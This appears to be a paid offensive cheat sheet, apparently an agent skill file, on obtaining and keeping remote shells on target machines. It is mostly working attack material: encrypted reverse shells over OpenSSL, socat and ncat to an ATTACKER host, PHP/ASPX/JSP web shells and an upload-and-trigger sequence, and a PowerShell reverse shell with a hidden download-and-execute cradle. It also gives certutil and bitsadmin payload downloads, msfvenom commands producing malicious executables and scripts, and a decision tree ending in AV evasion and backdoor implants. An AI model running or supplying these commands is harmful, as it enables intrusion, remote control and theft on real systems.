reverse-shell-techniques

$27

1. REVERSE vs BIND SHELL DECISION

Factor

Reverse Shell

Bind Shell

Firewall (egress)

Works if outbound allowed

Blocked by egress filtering

Firewall (ingress)

Not blocked

Requires inbound access to victim

NAT

Works (victim connects out)

Fails (can't reach victim behind NAT)

Detection

Outbound connection — less suspicious

Listening port — easily detected

Default choice

Almost always preferred

Only when no egress + have inbound

2. ENCRYPTED SHELLS

OpenSSL Reverse Shell

# Attacker: generate cert + listen

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj '/CN=localhost'

openssl s_server -quiet -key key.pem -cert cert.pem -port 4444

# Victim:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&#x26;1 | openssl s_client -quiet -connect ATTACKER:4444 > /tmp/s; rm /tmp/s

Socat Encrypted Shell

# Attacker: generate cert + listen

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 30 -out shell.crt

cat shell.key shell.crt > shell.pem

socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0,fork STDOUT

# Victim:

socat OPENSSL:ATTACKER:4444,verify=0 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane

Ncat SSL

# Attacker:

ncat --ssl -lvnp 4444

# Victim:

ncat --ssl ATTACKER 4444 -e /bin/bash

3. WEB SHELLS

PHP

<?php system($_GET['cmd']); ?>

<?php echo shell_exec($_GET['cmd']); ?>

<?php passthru($_REQUEST['cmd']); ?>

<!-- Minimal stealth shell -->

<?=`$_GET[0]`?>

<!-- POST-based with password -->

<?php if($_POST['k']==='SECRET'){system($_POST['cmd']);} ?>

ASPX

<%@ Page Language="C#" %>

<%@ Import Namespace="System.Diagnostics" %>

<% Process.Start(new ProcessStartInfo("cmd.exe","/c "+Request["cmd"]){UseShellExecute=false,RedirectStandardOutput=true}).StandardOutput.ReadToEnd(); %>

JSP

<%@ page import="java.io.*" %>

<% Process p=Runtime.getRuntime().exec(request.getParameter("cmd"));

BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

String l;while((l=br.readLine())!=null){out.println(l);} %>

Upload + Trigger Patterns

1. Find upload endpoint → upload shell with allowed extension bypass

2. Locate uploaded file (predictable path, directory listing, response leak)

3. Trigger: GET /uploads/shell.php?cmd=id

4. Upgrade to reverse shell: ?cmd=bash -c 'bash -i >& /dev/tcp/ATTACKER/4444 0>&1'

4. PTY UPGRADE SEQUENCE

Standard Python Upgrade

# Step 1: Spawn PTY

python3 -c 'import pty;pty.spawn("/bin/bash")'

# Step 2: Background shell

# Press Ctrl+Z

# Step 3: Configure terminal (on attacker)

stty raw -echo; fg

# Step 4: Set environment (back in shell)

export TERM=xterm-256color

stty rows 40 cols 160

Alternative Upgrades

# script command

script /dev/null -c bash

# socat full PTY (requires socat on victim)

# Attacker:

socat file:`tty`,raw,echo=0 tcp-listen:4444

# Victim:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER:4444

# rlwrap for readline support (attacker side)

rlwrap nc -lvnp 4444

# expect

/usr/bin/expect -c 'spawn bash; interact'

5. FILE TRANSFER METHODS

Linux

# wget / curl

wget http://ATTACKER:8000/file -O /tmp/file

curl http://ATTACKER:8000/file -o /tmp/file

# Python HTTP server (attacker side)

python3 -m http.server 8000

# nc file transfer

# Receiver:

nc -lvnp 9999 > file

# Sender:

nc RECEIVER 9999 < file

# base64 encode/decode (no tools needed)

# Encode on source:

base64 -w0 file

# Paste on target:

echo "BASE64_STRING" | base64 -d > file

# scp through pivot

scp -o ProxyJump=pivot user@target:/path/file ./local

Windows

# PowerShell DownloadFile

(New-Object Net.WebClient).DownloadFile('http://ATTACKER/file','C:\temp\file')

# PowerShell Invoke-WebRequest (PS 3.0+)

Invoke-WebRequest -Uri http://ATTACKER/file -OutFile C:\temp\file

iwr http://ATTACKER/file -o C:\temp\file

# certutil

certutil -urlcache -f http://ATTACKER/file C:\temp\file

# bitsadmin

bitsadmin /transfer job /download /priority high http://ATTACKER/file C:\temp\file

# SMB share (attacker hosts)

# Attacker: impacket-smbserver share /tmp/share -smb2support

copy \\ATTACKER\share\file C:\temp\file

6. POWERSHELL REVERSE SHELLS

# One-liner TCP reverse shell

$c=New-Object Net.Sockets.TCPClient('ATTACKER',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$r2=$r+'PS '+(pwd).Path+'> ';$sb=([Text.Encoding]::ASCII).GetBytes($r2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()

# Download cradle + execute

powershell -nop -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/shell.ps1')"

# Base64 encoded execution

$cmd = '...reverse shell code...'

$bytes = [Text.Encoding]::Unicode.GetBytes($cmd)

$encoded = [Convert]::ToBase64String($bytes)

powershell -ep bypass -enc $encoded

7. MSFVENOM PAYLOADS

# Linux reverse shell (ELF)

msfvenom -p linux/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f elf -o shell

# Windows reverse shell (EXE)

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o shell.exe

# Meterpreter (staged)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACKER LPORT=4444 -f exe -o meter.exe

# Web payloads

msfvenom -p php/reverse_php LHOST=ATTACKER LPORT=4444 -f raw > shell.php

msfvenom -p java/jsp_shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f raw > shell.jsp

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f aspx -o shell.aspx

# DLL / HTA / VBS

msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f dll -o evil.dll

msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f hta-psh -o evil.hta

msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKER LPORT=4444 -f vbs -o evil.vbs

8. DECISION TREE

Need remote shell on target

│

├── Can execute commands already (RCE)?

│   ├── Linux target?

│   │   ├── bash/python/perl available? → one-liner reverse shell (CHEATSHEET.md)

│   │   ├── Need encryption? → OpenSSL or socat SSL shell (§2)

│   │   └── Outbound blocked? → bind shell or tunnel (see tunneling-and-pivoting)

│   │

│   ├── Windows target?

│   │   ├── PowerShell available? → PS reverse shell (§6)

│   │   ├── Need binary? → msfvenom payload (§7)

│   │   └── AV blocking? → load windows-av-evasion skill

│   │

│   └── Web server (upload possible)?

│       ├── PHP? → PHP web shell (§3) → upgrade to reverse shell

│       ├── ASP.NET? → ASPX shell (§3)

│       └── Java/Tomcat? → JSP shell (§3)

│

├── Got a dumb shell?

│   ├── Python available? → PTY upgrade (§4)

│   ├── script available? → script /dev/null -c bash (§4)

│   ├── socat on target? → socat full PTY (§4)

│   └── None? → rlwrap on attacker side for readline

│

├── Need to transfer tools?

│   ├── Linux: wget/curl/nc/base64 (§5)

│   ├── Windows: certutil/PowerShell/bitsadmin/SMB (§5)

│   └── No outbound? → base64 copy-paste (§5)

│

└── Shell established — next steps?

    ├── Privilege escalation → load linux/windows-privilege-escalation

    ├── Pivot to internal network → load tunneling-and-pivoting

    └── Persistence → implant backdoor